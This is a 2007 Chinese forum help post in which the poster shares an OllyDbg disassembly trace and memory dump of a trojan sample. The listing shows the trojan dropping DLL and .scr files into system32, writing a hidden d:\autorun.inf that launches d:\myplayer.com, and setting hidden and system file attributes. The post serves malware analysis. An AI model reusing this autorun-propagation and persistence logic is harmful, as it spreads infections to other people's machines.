-
-
[求助]一个木马病毒的样本
-
发表于: 2007-5-16 07:57
-
下面是我用OD跟踪之后看到的结果:
00408004 6A 00 push 0
00408006 6A 00 push 0
00408008 49 dec ecx
00408009 ^ 75 F9 jnz short 00408004
0040800B 51 push ecx
0040800C 53 push ebx
0040800D 56 push esi
0040800E 57 push edi
0040800F B8 C47F4000 mov eax, 00407FC4
00408014 E8 43C1FFFF call 0040415C
00408019 33C0 xor eax, eax
0040801B 55 push ebp
0040801C 68 2E8E4000 push 00408E2E
00408021 64:FF30 push dword ptr fs:[eax]
00408024 64:8920 mov dword ptr fs:[eax], esp
00408027 C605 9CB64000 0>mov byte ptr [40B69C], 0
0040802E 33C0 xor eax, eax
00408030 A3 08B74000 mov dword ptr [40B708], eax
00408035 33D2 xor edx, edx
00408037 55 push ebp
00408038 68 FB8D4000 push 00408DFB
0040803D 64:FF32 push dword ptr fs:[edx]
00408040 64:8922 mov dword ptr fs:[edx], esp
00408043 33D2 xor edx, edx
00408045 55 push ebp
00408046 68 538C4000 push 00408C53
0040804B 64:FF32 push dword ptr fs:[edx]
0040804E 64:8922 mov dword ptr fs:[edx], esp
00408051 E8 96A6FFFF call 004026EC
00408056 85C0 test eax, eax
00408058 7E 1A jle short 00408074
0040805A 8D55 EC lea edx, dword ptr [ebp-14]
0040805D B8 01000000 mov eax, 1
00408062 E8 E5A6FFFF call 0040274C
00408067 8B45 EC mov eax, dword ptr [ebp-14]
0040806A BA 488E4000 mov edx, 00408E48 ; ASCII "-sj"
0040806F E8 B0B8FFFF call 00403924
00408074 8D55 E8 lea edx, dword ptr [ebp-18]
00408077 B8 548E4000 mov eax, 00408E54 ; ASCII "070514 "
0040807C E8 EBCDFFFF call 00404E6C
00408081 8B55 E8 mov edx, dword ptr [ebp-18]
00408084 B8 C0B64000 mov eax, 0040B6C0
00408089 E8 26B6FFFF call 004036B4
0040808E 8D55 E4 lea edx, dword ptr [ebp-1C]
00408091 B8 708E4000 mov eax, 00408E70 ; ASCII "934236 "
00408096 E8 D1CDFFFF call 00404E6C
0040809B 8B55 E4 mov edx, dword ptr [ebp-1C]
0040809E B8 04B74000 mov eax, 0040B704
004080A3 E8 0CB6FFFF call 004036B4
004080A8 68 A0B64000 push 0040B6A0
004080AD B9 01000000 mov ecx, 1
004080B2 BA 01000000 mov edx, 1
004080B7 B8 988E4000 mov eax, 00408E98
004080BC E8 6FB9FFFF call 00403A30
004080C1 8D45 E0 lea eax, dword ptr [ebp-20]
004080C4 50 push eax
004080C5 B9 01000000 mov ecx, 1
004080CA BA 01000000 mov edx, 1
004080CF B8 A48E4000 mov eax, 00408EA4
004080D4 E8 57B9FFFF call 00403A30
004080D9 8B55 E0 mov edx, dword ptr [ebp-20]
004080DC B8 A0B64000 mov eax, 0040B6A0
004080E1 E8 FAB6FFFF call 004037E0
004080E6 B8 A0B64000 mov eax, 0040B6A0
004080EB BA B08E4000 mov edx, 00408EB0
004080F0 E8 EBB6FFFF call 004037E0
004080F5 B8 A0B64000 mov eax, 0040B6A0
004080FA BA BC8E4000 mov edx, 00408EBC ; ASCII "in"
004080FF E8 DCB6FFFF call 004037E0
00408104 B8 A0B64000 mov eax, 0040B6A0
00408109 BA C88E4000 mov edx, 00408EC8 ; ASCII "sy"
0040810E E8 CDB6FFFF call 004037E0
00408113 B8 A0B64000 mov eax, 0040B6A0
00408118 BA D48E4000 mov edx, 00408ED4 ; ASCII "s.i"
0040811D E8 BEB6FFFF call 004037E0
00408122 B8 A0B64000 mov eax, 0040B6A0
00408127 BA E08E4000 mov edx, 00408EE0 ; ASCII "ni"
0040812C E8 AFB6FFFF call 004037E0
00408131 8D45 DC lea eax, dword ptr [ebp-24]
00408134 E8 93CBFFFF call 00404CCC
00408139 8B55 DC mov edx, dword ptr [ebp-24]
0040813C B8 B4B64000 mov eax, 0040B6B4
00408141 E8 6EB5FFFF call 004036B4
00408146 8D55 D4 lea edx, dword ptr [ebp-2C]
00408149 33C0 xor eax, eax
0040814B E8 FCA5FFFF call 0040274C
00408150 8B45 D4 mov eax, dword ptr [ebp-2C]
00408153 8D55 D8 lea edx, dword ptr [ebp-28]
00408156 E8 8DE2FFFF call 004063E8
0040815B 8B55 D8 mov edx, dword ptr [ebp-28]
0040815E B8 B8B64000 mov eax, 0040B6B8
00408163 E8 4CB5FFFF call 004036B4
00408168 B8 D0B64000 mov eax, 0040B6D0
0040816D BA EC8E4000 mov edx, 00408EEC ; ASCII "Alx"
00408172 E8 3DB5FFFF call 004036B4
00408177 B8 D0B64000 mov eax, 0040B6D0
0040817C BA F88E4000 mov edx, 00408EF8
00408181 E8 5AB6FFFF call 004037E0
00408186 B8 D0B64000 mov eax, 0040B6D0
0040818B BA 048F4000 mov edx, 00408F04 ; ASCII "es"
00408190 E8 4BB6FFFF call 004037E0
00408195 B8 D4B64000 mov eax, 0040B6D4
0040819A BA 108F4000 mov edx, 00408F10 ; ASCII "win"
0040819F E8 10B5FFFF call 004036B4
004081A4 B8 D4B64000 mov eax, 0040B6D4
004081A9 BA C88E4000 mov edx, 00408EC8 ; ASCII "sy"
004081AE E8 2DB6FFFF call 004037E0
004081B3 B8 D4B64000 mov eax, 0040B6D4
004081B8 BA 1C8F4000 mov edx, 00408F1C ; ASCII "s16_"
004081BD E8 1EB6FFFF call 004037E0
004081C2 B8 D8B64000 mov eax, 0040B6D8
004081C7 BA 2C8F4000 mov edx, 00408F2C ; ASCII "wins"
004081CC E8 E3B4FFFF call 004036B4
004081D1 B8 D8B64000 mov eax, 0040B6D8
004081D6 BA 3C8F4000 mov edx, 00408F3C ; ASCII "ys32_"
004081DB E8 00B6FFFF call 004037E0
004081E0 B8 DCB64000 mov eax, 0040B6DC
004081E5 BA 4C8F4000 mov edx, 00408F4C ; ASCII "scrsys"
004081EA E8 C5B4FFFF call 004036B4
004081EF B8 E0B64000 mov eax, 0040B6E0
004081F4 BA 5C8F4000 mov edx, 00408F5C ; ASCII "scrs"
004081F9 E8 B6B4FFFF call 004036B4
004081FE B8 E0B64000 mov eax, 0040B6E0
00408203 BA 6C8F4000 mov edx, 00408F6C ; ASCII "ys16_"
00408208 E8 D3B5FFFF call 004037E0
0040820D 8D55 D0 lea edx, dword ptr [ebp-30]
00408210 B8 7C8F4000 mov eax, 00408F7C ; ASCII "d:\myplayer.com"
00408215 E8 CEE1FFFF call 004063E8
0040821A 8B55 D0 mov edx, dword ptr [ebp-30]
0040821D B8 C8B64000 mov eax, 0040B6C8
00408222 E8 8DB4FFFF call 004036B4
00408227 B8 E4B64000 mov eax, 0040B6E4
0040822C BA 948F4000 mov edx, 00408F94 ; ASCII "hi"
00408231 E8 7EB4FFFF call 004036B4
00408236 B8 E4B64000 mov eax, 0040B6E4
0040823B BA A08F4000 mov edx, 00408FA0 ; ASCII "tpop"
00408240 E8 9BB5FFFF call 004037E0
00408245 B8 CCB64000 mov eax, 0040B6CC
0040824A BA B08F4000 mov edx, 00408FB0 ; ASCII "d:\autorun.inf"
0040824F E8 60B4FFFF call 004036B4
00408254 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408259 50 push eax
0040825A 8D45 CC lea eax, dword ptr [ebp-34]
0040825D 50 push eax
0040825E B9 C88F4000 mov ecx, 00408FC8
00408263 BA D48F4000 mov edx, 00408FD4 ; ASCII "ver"
00408268 A1 E4B64000 mov eax, dword ptr [40B6E4]
0040826D E8 9ADDFFFF call 0040600C
00408272 8B55 CC mov edx, dword ptr [ebp-34]
00408275 B8 C4B64000 mov eax, 0040B6C4
0040827A E8 35B4FFFF call 004036B4
0040827F 8D55 C8 lea edx, dword ptr [ebp-38]
00408282 A1 C8B64000 mov eax, dword ptr [40B6C8]
00408287 E8 5CE1FFFF call 004063E8
0040828C 8B45 C8 mov eax, dword ptr [ebp-38]
0040828F 8B15 B8B64000 mov edx, dword ptr [40B6B8]
00408295 E8 8AB6FFFF call 00403924
0040829A 0F85 9C000000 jnz 0040833C
004082A0 A1 C0B64000 mov eax, dword ptr [40B6C0]
004082A5 E8 B6CBFFFF call 00404E60
004082AA 8BD8 mov ebx, eax
004082AC A1 C4B64000 mov eax, dword ptr [40B6C4]
004082B1 E8 AACBFFFF call 00404E60
004082B6 3BD8 cmp ebx, eax
004082B8 7D 0C jge short 004082C6
004082BA C605 9CB64000 0>mov byte ptr [40B69C], 1
004082C1 E9 83090000 jmp 00408C49
004082C6 FF35 B4B64000 push dword ptr [40B6B4]
004082CC FF35 D0B64000 push dword ptr [40B6D0]
004082D2 FF35 C0B64000 push dword ptr [40B6C0]
004082D8 68 E08F4000 push 00408FE0 ; ASCII ".exe"
004082DD B8 B0B64000 mov eax, 0040B6B0
004082E2 BA 04000000 mov edx, 4
004082E7 E8 ACB5FFFF call 00403898
004082EC A1 B0B64000 mov eax, dword ptr [40B6B0]
004082F1 50 push eax
004082F2 E8 0DDDFFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
004082F7 85C0 test eax, eax
004082F9 74 41 je short 0040833C
004082FB FF35 B4B64000 push dword ptr [40B6B4] ; C:\WINDOWS\system32\
00408301 FF35 D4B64000 push dword ptr [40B6D4] ; winsys16_
00408307 FF35 C0B64000 push dword ptr [40B6C0] ; 070514
0040830D 68 F08F4000 push 00408FF0 ; ASCII ".dll"
00408312 B8 B0B64000 mov eax, 0040B6B0
****************************************************************************************
0040B6A0 00970054 ASCII "mywinsys.ini"
0040B6A4 00000000
0040B6A8 00000000
0040B6AC 00000000
0040B6B0 009701EC ASCII "C:\WINDOWS\system32\winsys16_070514.dll"
0040B6B4 00970070 ASCII "C:\WINDOWS\system32\"
0040B6B8 009700B0 ASCII "d:\myplayer.com"
0040B6BC 00000000
0040B6C0 0097000C ASCII "070514"
0040B6C4 00970188 ASCII "070514"
0040B6C8 0097013C ASCII "d:\myplayer.com"
0040B6CC 0097016C ASCII "d:\autorun.inf"
0040B6D0 009700CC ASCII "AlxRes"
0040B6D4 009700E0 ASCII "winsys16_"
0040B6D8 009700F8 ASCII "winsys32_"
0040B6DC 00970110 ASCII "scrsys"
0040B6E0 00970124 ASCII "scrsys16_"
0040B6E4 00970158 ASCII "hitpop"
****************************************************************************************
00408317 BA 04000000 mov edx, 4
0040831C E8 77B5FFFF call 00403898
00408321 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408326 50 push eax
00408327 E8 D8DCFFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
0040832C 85C0 test eax, eax
0040832E 74 0C je short 0040833C
00408330 C605 9CB64000 0>mov byte ptr [40B69C], 1
00408337 E9 0D090000 jmp 00408C49
0040833C A1 A0B64000 mov eax, dword ptr [40B6A0]
00408341 50 push eax
00408342 8D45 C4 lea eax, dword ptr [ebp-3C]
00408345 50 push eax
00408346 B9 C88F4000 mov ecx, 00408FC8
0040834B BA 00904000 mov edx, 00409000 ; ASCII "first"
00408350 A1 E4B64000 mov eax, dword ptr [40B6E4]
00408355 E8 B2DCFFFF call 0040600C
0040835A 8B45 C4 mov eax, dword ptr [ebp-3C]
0040835D BA C88F4000 mov edx, 00408FC8
00408362 E8 BDB5FFFF call 00403924
00408367 0F85 9C000000 jnz 00408409
0040836D B0 01 mov al, 1
0040836F E8 4CCAFFFF call 00404DC0
00408374 B8 FCB64000 mov eax, 0040B6FC
00408379 BA 10904000 mov edx, 00409010 ; ASCII "te"
0040837E E8 31B3FFFF call 004036B4
00408383 B8 FCB64000 mov eax, 0040B6FC
00408388 BA 1C904000 mov edx, 0040901C ; ASCII "st"
0040838D E8 4EB4FFFF call 004037E0
00408392 E8 BDE9FFFF call 00406D54
00408397 84C0 test al, al
00408399 74 4F je short 004083EA
0040839B A1 A0B64000 mov eax, dword ptr [40B6A0]
004083A0 50 push eax
004083A1 8D45 C0 lea eax, dword ptr [ebp-40]
004083A4 50 push eax
004083A5 B9 C88F4000 mov ecx, 00408FC8
004083AA 8B15 FCB64000 mov edx, dword ptr [40B6FC]
004083B0 A1 E4B64000 mov eax, dword ptr [40B6E4]
004083B5 E8 52DCFFFF call 0040600C
004083BA 8B45 C0 mov eax, dword ptr [ebp-40]
004083BD BA 28904000 mov edx, 00409028
004083C2 E8 5DB5FFFF call 00403924
004083C7 74 40 je short 00408409
004083C9 A1 A0B64000 mov eax, dword ptr [40B6A0]
004083CE 50 push eax
004083CF 8D45 BC lea eax, dword ptr [ebp-44]
004083D2 50 push eax
004083D3 B9 C88F4000 mov ecx, 00408FC8
004083D8 8B15 FCB64000 mov edx, dword ptr [40B6FC]
004083DE A1 E4B64000 mov eax, dword ptr [40B6E4]
004083E3 E8 DCDCFFFF call 004060C4
004083E8 EB 1F jmp short 00408409
004083EA A1 A0B64000 mov eax, dword ptr [40B6A0]
004083EF 50 push eax
004083F0 8D45 B8 lea eax, dword ptr [ebp-48]
004083F3 50 push eax
004083F4 B9 28904000 mov ecx, 00409028
004083F9 8B15 FCB64000 mov edx, dword ptr [40B6FC]
004083FF A1 E4B64000 mov eax, dword ptr [40B6E4]
00408404 E8 BBDCFFFF call 004060C4
00408409 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040840E 50 push eax
0040840F 8D45 B4 lea eax, dword ptr [ebp-4C]
00408412 50 push eax
00408413 B9 28904000 mov ecx, 00409028
00408418 BA 00904000 mov edx, 00409000 ; ASCII "first"
0040841D A1 E4B64000 mov eax, dword ptr [40B6E4]
00408422 E8 9DDCFFFF call 004060C4
00408427 8D55 B0 lea edx, dword ptr [ebp-50]
0040842A 33C0 xor eax, eax
0040842C E8 1BA3FFFF call 0040274C
00408431 8B55 B0 mov edx, dword ptr [ebp-50]
00408434 B8 34904000 mov eax, 00409034
00408439 E8 7AB6FFFF call 00403AB8
0040843E 85C0 test eax, eax
00408440 7E 1E jle short 00408460
00408442 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408447 50 push eax
00408448 8D45 AC lea eax, dword ptr [ebp-54]
0040844B 50 push eax
0040844C B9 28904000 mov ecx, 00409028
00408451 BA 44904000 mov edx, 00409044 ; ASCII "test"
00408456 A1 E4B64000 mov eax, dword ptr [40B6E4]
0040845B E8 64DCFFFF call 004060C4
00408460 B0 01 mov al, 1
00408462 E8 59C9FFFF call 00404DC0
00408467 E8 5CEBFFFF call 00406FC8
0040846C A2 F8B64000 mov byte ptr [40B6F8], al
00408471 B0 01 mov al, 1
00408473 E8 48C9FFFF call 00404DC0
00408478 E8 BBDFFFFF call 00406438
0040847D 68 BCB64000 push 0040B6BC
00408482 6A 00 push 0
00408484 6A 00 push 0
00408486 68 D4514000 push 004051D4
0040848B 6A 00 push 0
0040848D 6A 00 push 0
0040848F E8 E4BDFFFF call 00404278 ; jmp 到 kernel32.CreateThread
00408494 A3 08B74000 mov dword ptr [40B708], eax
00408499 803D F8B64000 0>cmp byte ptr [40B6F8], 0
004084A0 0F84 AA000000 je 00408550
004084A6 33C0 xor eax, eax
004084A8 55 push ebp
004084A9 68 46854000 push 00408546
004084AE 64:FF30 push dword ptr fs:[eax]
004084B1 64:8920 mov dword ptr fs:[eax], esp
004084B4 E8 4BE8FFFF call 00406D04
004084B9 83C4 F8 add esp, -8
004084BC DD1C24 fstp qword ptr [esp]
004084BF 9B wait
004084C0 68 EEB64000 push 0040B6EE
004084C5 68 F0B64000 push 0040B6F0
004084CA 68 F2B64000 push 0040B6F2
004084CF 68 F4B64000 push 0040B6F4
004084D4 B9 ECB64000 mov ecx, 0040B6EC
004084D9 BA EAB64000 mov edx, 0040B6EA
004084DE B8 E8B64000 mov eax, 0040B6E8
004084E3 E8 3CE6FFFF call 00406B24
004084E8 66:A1 E8B64000 mov ax, word ptr [40B6E8]
004084EE 66:A3 F6B64000 mov word ptr [40B6F6], ax
004084F4 66:C705 E8B6400>mov word ptr [40B6E8], 7C3
004084FD 66:A1 EEB64000 mov ax, word ptr [40B6EE]
00408503 50 push eax
00408504 66:A1 F0B64000 mov ax, word ptr [40B6F0]
0040850A 50 push eax
0040850B 66:A1 F2B64000 mov ax, word ptr [40B6F2]
00408511 50 push eax
00408512 66:A1 F4B64000 mov ax, word ptr [40B6F4]
00408518 50 push eax
00408519 66:8B0D ECB6400>mov cx, word ptr [40B6EC]
00408520 66:8B15 EAB6400>mov dx, word ptr [40B6EA]
00408527 66:A1 E8B64000 mov ax, word ptr [40B6E8]
0040852D E8 46EFFFFF call 00407478
00408532 68 983A0000 push 3A98
00408537 E8 E4BDFFFF call 00404320 ; jmp 到 kernel32.Sleep
0040853C 33C0 xor eax, eax
0040853E 5A pop edx
0040853F 59 pop ecx
00408540 59 pop ecx
00408541 64:8910 mov dword ptr fs:[eax], edx
00408544 EB 0A jmp short 00408550
00408546 ^ E9 85AAFFFF jmp 00402FD0
0040854B E8 38ACFFFF call 00403188
00408550 8D55 A8 lea edx, dword ptr [ebp-58]
00408553 A1 04B74000 mov eax, dword ptr [40B704]
00408558 E8 8BDEFFFF call 004063E8
0040855D 8B45 A8 mov eax, dword ptr [ebp-58]
00408560 BA 54904000 mov edx, 00409054 ; ASCII "2863735ben"
00408565 E8 BAB3FFFF call 00403924
0040856A 74 1C je short 00408588
0040856C 8D55 A4 lea edx, dword ptr [ebp-5C]
0040856F A1 04B74000 mov eax, dword ptr [40B704]
00408574 E8 6FDEFFFF call 004063E8
00408579 8B45 A4 mov eax, dword ptr [ebp-5C]
0040857C BA 44904000 mov edx, 00409044 ; ASCII "test"
00408581 E8 9EB3FFFF call 00403924
00408586 75 71 jnz short 004085F9
00408588 33C0 xor eax, eax
0040858A 55 push ebp
0040858B 68 EF854000 push 004085EF
00408590 64:FF30 push dword ptr fs:[eax]
00408593 64:8920 mov dword ptr fs:[eax], esp
00408596 6A 00 push 0
00408598 A1 CCB64000 mov eax, dword ptr [40B6CC]
0040859D E8 36B4FFFF call 004039D8
004085A2 8BD8 mov ebx, eax
004085A4 53 push ebx
004085A5 E8 56BDFFFF call 00404300 ; jmp 到 kernel32.SetFileAttributesA
004085AA 68 F4010000 push 1F4
004085AF E8 6CBDFFFF call 00404320 ; jmp 到 kernel32.Sleep
004085B4 A1 CCB64000 mov eax, dword ptr [40B6CC]
004085B9 50 push eax
004085BA 8D45 A0 lea eax, dword ptr [ebp-60]
004085BD 50 push eax
004085BE 8B0D C8B64000 mov ecx, dword ptr [40B6C8]
004085C4 BA 68904000 mov edx, 00409068 ; ASCII "open"
004085C9 B8 78904000 mov eax, 00409078 ; ASCII "autorun"
004085CE E8 F1DAFFFF call 004060C4
004085D3 68 F4010000 push 1F4
004085D8 E8 43BDFFFF call 00404320 ; jmp 到 kernel32.Sleep
004085DD 6A 07 push 7
004085DF 53 push ebx
004085E0 E8 1BBDFFFF call 00404300 ; jmp 到 kernel32.SetFileAttributesA
004085E5 33C0 xor eax, eax
004085E7 5A pop edx
004085E8 59 pop ecx
004085E9 59 pop ecx
004085EA 64:8910 mov dword ptr fs:[eax], edx
004085ED EB 0A jmp short 004085F9
004085EF ^ E9 DCA9FFFF jmp 00402FD0
004085F4 E8 8FABFFFF call 00403188
004085F9 A1 C0B64000 mov eax, dword ptr [40B6C0]
004085FE E8 5DC8FFFF call 00404E60
00408603 8BD8 mov ebx, eax
00408605 A1 C4B64000 mov eax, dword ptr [40B6C4]
0040860A E8 51C8FFFF call 00404E60
0040860F 3BD8 cmp ebx, eax
00408611 0F8E A0010000 jle 004087B7
00408617 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040861C 50 push eax
0040861D 8D45 9C lea eax, dword ptr [ebp-64]
00408620 50 push eax
00408621 8B0D C0B64000 mov ecx, dword ptr [40B6C0]
00408627 BA D48F4000 mov edx, 00408FD4 ; ASCII "ver"
0040862C A1 E4B64000 mov eax, dword ptr [40B6E4]
00408631 E8 8EDAFFFF call 004060C4
00408636 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040863B 50 push eax
0040863C 8D45 98 lea eax, dword ptr [ebp-68]
0040863F 50 push eax
00408640 33C9 xor ecx, ecx
00408642 BA 88904000 mov edx, 00409088 ; ASCII "fn"
00408647 B8 94904000 mov eax, 00409094 ; ASCII "dll_start"
0040864C E8 BBD9FFFF call 0040600C
00408651 8B55 98 mov edx, dword ptr [ebp-68]
00408654 B8 B0B64000 mov eax, 0040B6B0
00408659 E8 56B0FFFF call 004036B4
0040865E A1 A0B64000 mov eax, dword ptr [40B6A0]
00408663 50 push eax
00408664 8D45 94 lea eax, dword ptr [ebp-6C]
00408667 50 push eax
00408668 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
0040866E BA A8904000 mov edx, 004090A8 ; ASCII "dll"
00408673 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408678 E8 47DAFFFF call 004060C4
0040867D A1 A0B64000 mov eax, dword ptr [40B6A0]
00408682 50 push eax
00408683 8D45 90 lea eax, dword ptr [ebp-70]
00408686 50 push eax
00408687 33C9 xor ecx, ecx
00408689 BA 88904000 mov edx, 00409088 ; ASCII "fn"
0040868E B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
00408693 E8 74D9FFFF call 0040600C
00408698 8B55 90 mov edx, dword ptr [ebp-70]
0040869B B8 B0B64000 mov eax, 0040B6B0
004086A0 E8 0FB0FFFF call 004036B4
004086A5 A1 A0B64000 mov eax, dword ptr [40B6A0]
004086AA 50 push eax
004086AB 8D45 8C lea eax, dword ptr [ebp-74]
004086AE 50 push eax
004086AF 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
004086B5 BA C0904000 mov edx, 004090C0 ; ASCII "exe"
004086BA B8 B4904000 mov eax, 004090B4 ; ASCII "old"
004086BF E8 00DAFFFF call 004060C4
004086C4 A1 A0B64000 mov eax, dword ptr [40B6A0]
004086C9 50 push eax
004086CA 8D45 88 lea eax, dword ptr [ebp-78]
004086CD 50 push eax
004086CE 33C9 xor ecx, ecx
004086D0 BA 88904000 mov edx, 00409088 ; ASCII "fn"
004086D5 B8 CC904000 mov eax, 004090CC ; ASCII "dll_hitpop"
004086DA E8 2DD9FFFF call 0040600C
004086DF 8B55 88 mov edx, dword ptr [ebp-78]
004086E2 B8 B0B64000 mov eax, 0040B6B0
004086E7 E8 C8AFFFFF call 004036B4
004086EC A1 A0B64000 mov eax, dword ptr [40B6A0]
004086F1 50 push eax
004086F2 8D45 84 lea eax, dword ptr [ebp-7C]
004086F5 50 push eax
004086F6 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
004086FC BA E0904000 mov edx, 004090E0 ; ASCII "dll32"
00408701 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408706 E8 B9D9FFFF call 004060C4
0040870B A1 A0B64000 mov eax, dword ptr [40B6A0]
00408710 50 push eax
00408711 8D45 80 lea eax, dword ptr [ebp-80]
00408714 50 push eax
00408715 33C9 xor ecx, ecx
00408717 BA 88904000 mov edx, 00409088 ; ASCII "fn"
0040871C B8 F0904000 mov eax, 004090F0 ; ASCII "exe_bak"
00408721 E8 E6D8FFFF call 0040600C
00408726 8B55 80 mov edx, dword ptr [ebp-80]
00408729 B8 B0B64000 mov eax, 0040B6B0
0040872E E8 81AFFFFF call 004036B4
00408733 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408738 E8 F3EAFFFF call 00407230
0040873D A1 A0B64000 mov eax, dword ptr [40B6A0]
00408742 50 push eax
00408743 8D85 7CFFFFFF lea eax, dword ptr [ebp-84]
00408749 50 push eax
0040874A 33C9 xor ecx, ecx
0040874C BA 88904000 mov edx, 00409088 ; ASCII "fn"
00408751 B8 00914000 mov eax, 00409100 ; ASCII "dll_start_bak"
00408756 E8 B1D8FFFF call 0040600C
0040875B 8B95 7CFFFFFF mov edx, dword ptr [ebp-84]
00408761 B8 B0B64000 mov eax, 0040B6B0
00408766 E8 49AFFFFF call 004036B4
0040876B A1 B0B64000 mov eax, dword ptr [40B6B0]
00408770 E8 BBEAFFFF call 00407230
00408775 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040877A 50 push eax
0040877B 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
00408781 50 push eax
00408782 33C9 xor ecx, ecx
00408784 BA 18914000 mov edx, 00409118 ; ASCII "fn_pif"
00408789 B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
0040878E E8 79D8FFFF call 0040600C
00408793 8B95 78FFFFFF mov edx, dword ptr [ebp-88]
00408799 B8 B0B64000 mov eax, 0040B6B0
0040879E E8 11AFFFFF call 004036B4
004087A3 A1 B0B64000 mov eax, dword ptr [40B6B0]
004087A8 E8 83EAFFFF call 00407230
004087AD 68 E8030000 push 3E8
004087B2 E8 69BBFFFF call 00404320 ; jmp 到 kernel32.Sleep
004087B7 8D85 74FFFFFF lea eax, dword ptr [ebp-8C]
004087BD E8 BAC5FFFF call 00404D7C
004087C2 8B15 C8B64000 mov edx, dword ptr [40B6C8]
004087C8 A1 B8B64000 mov eax, dword ptr [40B6B8]
004087CD E8 FAEAFFFF call 004072CC
004087D2 A1 A0B64000 mov eax, dword ptr [40B6A0]
004087D7 50 push eax
004087D8 8D85 70FFFFFF lea eax, dword ptr [ebp-90]
004087DE 50 push eax
004087DF 8B0D C8B64000 mov ecx, dword ptr [40B6C8]
004087E5 BA 18914000 mov edx, 00409118 ; ASCII "fn_pif"
004087EA B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
004087EF E8 D0D8FFFF call 004060C4
004087F4 FF35 B4B64000 push dword ptr [40B6B4]
004087FA FF35 D0B64000 push dword ptr [40B6D0]
00408800 FF35 C0B64000 push dword ptr [40B6C0]
00408806 68 E08F4000 push 00408FE0 ; ASCII ".exe"
0040880B B8 B0B64000 mov eax, 0040B6B0
00408810 BA 04000000 mov edx, 4
00408815 E8 7EB0FFFF call 00403898
0040881A 8B15 B0B64000 mov edx, dword ptr [40B6B0]
00408820 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408825 E8 A2EAFFFF call 004072CC
0040882A A1 A0B64000 mov eax, dword ptr [40B6A0]
0040882F 50 push eax
00408830 8D85 6CFFFFFF lea eax, dword ptr [ebp-94]
00408836 50 push eax
00408837 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
0040883D BA 88904000 mov edx, 00409088 ; ASCII "fn"
00408842 B8 C0904000 mov eax, 004090C0 ; ASCII "exe"
00408847 E8 78D8FFFF call 004060C4
0040884C FF35 B4B64000 push dword ptr [40B6B4]
00408852 FF35 DCB64000 push dword ptr [40B6DC]
00408858 FF35 C0B64000 push dword ptr [40B6C0]
0040885E 68 28914000 push 00409128 ; ASCII ".scr"
00408863 B8 B0B64000 mov eax, 0040B6B0
00408868 BA 04000000 mov edx, 4
0040886D E8 26B0FFFF call 00403898
00408872 8B15 B0B64000 mov edx, dword ptr [40B6B0]
00408878 A1 B8B64000 mov eax, dword ptr [40B6B8]
0040887D E8 4AEAFFFF call 004072CC
00408882 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408887 50 push eax
00408888 8D85 68FFFFFF lea eax, dword ptr [ebp-98]
0040888E 50 push eax
0040888F 8B0D B0B64000 mov ecx, dword ptr [40B6B0]
00408895 BA 88904000 mov edx, 00409088 ; ASCII "fn"
0040889A B8 F0904000 mov eax, 004090F0 ; ASCII "exe_bak"
0040889F E8 20D8FFFF call 004060C4
004088A4 FF35 B4B64000 push dword ptr [40B6B4]
004088AA FF35 D8B64000 push dword ptr [40B6D8]
004088B0 FF35 C0B64000 push dword ptr [40B6C0]
004088B6 68 F08F4000 push 00408FF0 ; ASCII ".dll"
004088BB B8 B0B64000 mov eax, 0040B6B0
004088C0 BA 04000000 mov edx, 4
004088C5 E8 CEAFFFFF call 00403898
004088CA B8 FCB64000 mov eax, 0040B6FC
004088CF 8B0D E4B64000 mov ecx, dword ptr [40B6E4]
004088D5 BA 38914000 mov edx, 00409138 ; ASCII "dll_"
004088DA E8 45AFFFFF call 00403824
004088DF A1 FCB64000 mov eax, dword ptr [40B6FC]
004088E4 50 push eax
004088E5 68 88904000 push 00409088 ; ASCII "fn"
004088EA A1 A0B64000 mov eax, dword ptr [40B6A0]
004088EF 50 push eax
004088F0 B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
004088F5 BA 48914000 mov edx, 00409148 ; ASCII "maindll"
004088FA A1 B0B64000 mov eax, dword ptr [40B6B0]
004088FF E8 80EAFFFF call 00407384
00408904 B8 00B74000 mov eax, 0040B700
00408909 8B15 B0B64000 mov edx, dword ptr [40B6B0]
0040890F E8 A0ADFFFF call 004036B4
00408914 FF35 B4B64000 push dword ptr [40B6B4]
0040891A FF35 E0B64000 push dword ptr [40B6E0]
00408920 FF35 C0B64000 push dword ptr [40B6C0]
00408926 68 28914000 push 00409128 ; ASCII ".scr"
0040892B B8 B0B64000 mov eax, 0040B6B0
00408930 BA 04000000 mov edx, 4
00408935 E8 5EAFFFFF call 00403898
0040893A 68 00914000 push 00409100 ; ASCII "dll_start_bak"
0040893F 68 88904000 push 00409088 ; ASCII "fn"
00408944 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408949 50 push eax
0040894A B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
0040894F BA 58914000 mov edx, 00409158 ; ASCII "start"
00408954 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408959 E8 26EAFFFF call 00407384
0040895E FF35 B4B64000 push dword ptr [40B6B4]
00408964 FF35 D4B64000 push dword ptr [40B6D4]
0040896A FF35 C0B64000 push dword ptr [40B6C0]
00408970 68 F08F4000 push 00408FF0 ; ASCII ".dll"
00408975 B8 B0B64000 mov eax, 0040B6B0
0040897A BA 04000000 mov edx, 4
0040897F E8 14AFFFFF call 00403898
00408984 68 94904000 push 00409094 ; ASCII "dll_start"
00408989 68 88904000 push 00409088 ; ASCII "fn"
0040898E A1 A0B64000 mov eax, dword ptr [40B6A0]
00408993 50 push eax
00408994 B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
